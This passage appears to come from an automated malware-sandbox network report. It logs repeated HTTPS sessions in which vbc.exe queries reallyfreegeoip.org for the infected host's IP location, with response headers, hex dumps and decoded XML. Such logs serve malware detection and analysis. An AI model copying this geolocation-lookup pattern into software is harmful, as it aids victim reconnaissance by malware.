                                                                                                                                            Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            8192.168.2.849727104.21.112.14431532C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-13 12:05:46 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                            Host: reallyfreegeoip.org
                                                                                                                                            2025-01-13 12:05:46 UTC861INHTTP/1.1 200 OK
                                                                                                                                            Date: Mon, 13 Jan 2025 12:05:46 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 362
                                                                                                                                            Connection: close
                                                                                                                                            Age: 2084735
                                                                                                                                            Cache-Control: max-age=31536000
                                                                                                                                            cf-cache-status: HIT
                                                                                                                                            last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Fc5Y0pvjMk6SH6sz%2FvbctC3YC48IJ%2F%2Bg4sHpaBCUnYEr02eSd%2Fmgu%2BmNxhQNYKTs1z7mance4vughXKLQrXKfbnSekMlUvrzaclMiFAlMsowfsBzU45w2p9IeZ3uhUBmDD6YSUjC"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 901541a788680f5b-EWR
                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1502&min_rtt=1496&rtt_var=573&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1888745&cwnd=221&unsent_bytes=0&cid=1a5ed3950c078ad4&ts=137&x=0"
                                                                                                                                            2025-01-13 12:05:46 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                            Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            9192.168.2.849730104.21.112.14433760C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-13 12:05:47 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                            Host: reallyfreegeoip.org
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            2025-01-13 12:05:48 UTC853INHTTP/1.1 200 OK
                                                                                                                                            Date: Mon, 13 Jan 2025 12:05:48 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 362
                                                                                                                                            Connection: close
                                                                                                                                            Age: 2084737
                                                                                                                                            Cache-Control: max-age=31536000
                                                                                                                                            cf-cache-status: HIT
                                                                                                                                            last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3FzQqjDHek65oA4PDhOwIAP7HLTUV0jWLFvDpPWmlKFgZZCX61phXGEpPdxl8lfkOoEcnYkGW3j6yVuWCsVx1nWeMAU2Wsv2tVhx8f%2Bl5uSJcDOHt3RpeQHrGOH2qNNN%2F6E4Ushh"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 901541af5946727b-EWR
                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2009&min_rtt=1996&rtt_var=758&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1462925&cwnd=234&unsent_bytes=0&cid=1e9feb92d273e357&ts=156&x=0"
                                                                                                                                            2025-01-13 12:05:48 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                            Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            10192.168.2.849731104.21.112.14431532C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-13 12:05:48 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                            Host: reallyfreegeoip.org
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            2025-01-13 12:05:48 UTC855INHTTP/1.1 200 OK
                                                                                                                                            Date: Mon, 13 Jan 2025 12:05:48 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 362
                                                                                                                                            Connection: close
                                                                                                                                            Age: 2084737
                                                                                                                                            Cache-Control: max-age=31536000
                                                                                                                                            cf-cache-status: HIT
                                                                                                                                            last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WYedPSgbXWKW65h3RRZFDoAWxgpUNmOwKUChfovUpHYGLQm0YZQAzuFNQzagn4SvaDb%2BcXiNZoJDVPSXmfqRyllhHZa9atSAtb3Z%2FCALvqoPBwLzVhJYf2wZm2ZOimw%2FxBpKIe3l"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 901541b08b8c729f-EWR
                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2435&min_rtt=1989&rtt_var=1639&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=524991&cwnd=169&unsent_bytes=0&cid=c43c30d88af4255f&ts=146&x=0"
                                                                                                                                            2025-01-13 12:05:48 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                            Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            11192.168.2.849735104.21.112.14433760C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-13 12:05:49 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                            Host: reallyfreegeoip.org
                                                                                                                                            2025-01-13 12:05:49 UTC853INHTTP/1.1 200 OK
                                                                                                                                            Date: Mon, 13 Jan 2025 12:05:49 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 362
                                                                                                                                            Connection: close
                                                                                                                                            Age: 2084738
                                                                                                                                            Cache-Control: max-age=31536000
                                                                                                                                            cf-cache-status: HIT
                                                                                                                                            last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4cgF0hAPoMjip0WTXWk77NIIOdgPTPRx68XXbhPiQcUCyUWkgf%2BVga8IyxkaH5RWuNdg6SxJaBHcTBW%2BB37c8683nRtQHyQOwDOgZ010Wl4gNORIzOmaFMCBwyimZxIdh7tIQkmX"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 901541b8a82643b3-EWR
                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1570&min_rtt=1570&rtt_var=590&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1851616&cwnd=203&unsent_bytes=0&cid=0a61ee19514d1782&ts=129&x=0"
                                                                                                                                            2025-01-13 12:05:49 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                            Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            12192.168.2.849736104.21.112.14431532C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-13 12:05:49 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                            Host: reallyfreegeoip.org
                                                                                                                                            2025-01-13 12:05:49 UTC861INHTTP/1.1 200 OK
                                                                                                                                            Date: Mon, 13 Jan 2025 12:05:49 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 362
                                                                                                                                            Connection: close
                                                                                                                                            Age: 2084738
                                                                                                                                            Cache-Control: max-age=31536000
                                                                                                                                            cf-cache-status: HIT
                                                                                                                                            last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=87rK8CJPoPysw5h4OJ5LE5PB2rOv5xTBFSfvxAO0uda6%2BYe%2Be1V0uGHcwr4tcPHZ%2Ff055%2BFcqHK9GLeEYyeLKMB4C2l7xHw7gWpovk0Fti3GqqNTSgzdXU%2FEtUbJ4BKWK%2Bn6L99h"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 901541b9eea8729f-EWR
                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1917&min_rtt=1913&rtt_var=725&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1500513&cwnd=169&unsent_bytes=0&cid=9793111a2fe54483&ts=160&x=0"
                                                                                                                                            2025-01-13 12:05:49 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                            Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            13192.168.2.849741104.21.112.14433760C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-13 12:05:50 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                            Host: reallyfreegeoip.org
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            2025-01-13 12:05:51 UTC857INHTTP/1.1 200 OK
                                                                                                                                            Date: Mon, 13 Jan 2025 12:05:51 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 362
                                                                                                                                            Connection: close
                                                                                                                                            Age: 2084740
                                                                                                                                            Cache-Control: max-age=31536000
                                                                                                                                            cf-cache-status: HIT
                                                                                                                                            last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=O9K3kWrlI0Pu%2FBmQYeki6cVTA7Wzm3rG0RHxClmr%2BwbeTKjchCteMTxWiDgEy1H5zSNFJX6azRyKZn9o4pMjRFGerU0a8VHQRJ%2FPTqnL40xuMr9K8plhnmGb1ZrBM%2FNts28Hy0jX"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 901541c1c9c243b3-EWR
                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1562&min_rtt=1555&rtt_var=598&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1809169&cwnd=203&unsent_bytes=0&cid=695587a80020ac7b&ts=138&x=0"
                                                                                                                                            2025-01-13 12:05:51 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                            Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            14192.168.2.849742104.21.112.14431532C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-13 12:05:51 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                            Host: reallyfreegeoip.org
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            2025-01-13 12:05:51 UTC859INHTTP/1.1 200 OK
                                                                                                                                            Date: Mon, 13 Jan 2025 12:05:51 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 362
                                                                                                                                            Connection: close
                                                                                                                                            Age: 2084740
                                                                                                                                            Cache-Control: max-age=31536000
                                                                                                                                            cf-cache-status: HIT
                                                                                                                                            last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nQD%2FJUsM6xd5oCVb6c5V0ABpEdU%2FUD7ufr2Cp1oNOAO9koEeSfbsWm7vJnzKpA0sJzGfjBz6VfrncOOyjm5fdn6LrgxA2MBd%2F%2BfuVkBiQUCoeuDzNGd56VL2eRx%2FnkaZZAuVwYcD"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 901541c32f9bc34f-EWR
                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1527&min_rtt=1459&rtt_var=683&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1457813&cwnd=181&unsent_bytes=0&cid=ddd2e81d499cc3da&ts=138&x=0"
                                                                                                                                            2025-01-13 12:05:51 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                            Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            15192.168.2.849746104.21.112.14433760C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-13 12:05:52 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                            Host: reallyfreegeoip.org
                                                                                                                                            2025-01-13 12:05:52 UTC861INHTTP/1.1 200 OK
                                                                                                                                            Date: Mon, 13 Jan 2025 12:05:52 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 362
                                                                                                                                            Connection: close
                                                                                                                                            Age: 2084741
                                                                                                                                            Cache-Control: max-age=31536000
                                                                                                                                            cf-cache-status: HIT
                                                                                                                                            last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=b515Z%2BQvJ%2FUGuEFsUrbdY3Ri5OYAA1RNkI7t1bunPfBW%2FI%2FjD8G9j%2FHbeJl8uFzYkxRUBnxBZKH3ckztSHsO8xHwGnXhsyIJ0sLFyvKsYvffENNJ0vbgN%2Fs1wfW3vKtprQeYjzy9"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 901541caedb90f5b-EWR
                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1613&min_rtt=1596&rtt_var=634&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1680092&cwnd=221&unsent_bytes=0&cid=2826dcf0916a4bf4&ts=135&x=0"
                                                                                                                                            2025-01-13 12:05:52 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                            Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            16192.168.2.849747104.21.112.14431532C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-13 12:05:52 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                            Host: reallyfreegeoip.org
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            2025-01-13 12:05:52 UTC859INHTTP/1.1 200 OK
                                                                                                                                            Date: Mon, 13 Jan 2025 12:05:52 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 362
                                                                                                                                            Connection: close
                                                                                                                                            Age: 2084741
                                                                                                                                            Cache-Control: max-age=31536000
                                                                                                                                            cf-cache-status: HIT
                                                                                                                                            last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cFg5sVs%2FSY1iGVg2zpoSh4RKkVOjxYIqrAp2W%2Fdmk3GXuQEHqhVN92t%2BOMMAl%2BnT6pKrjzn6GAnGZ9ao76Gy2lYHHjzkojjSU5lhPkS%2Fqs40KCjwTlnG02l26BLJRPwPtDLFQ40L"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 901541cc7ec3c34f-EWR
                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1433&min_rtt=1406&rtt_var=582&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1796923&cwnd=181&unsent_bytes=0&cid=8423f9fa508f4eb1&ts=183&x=0"
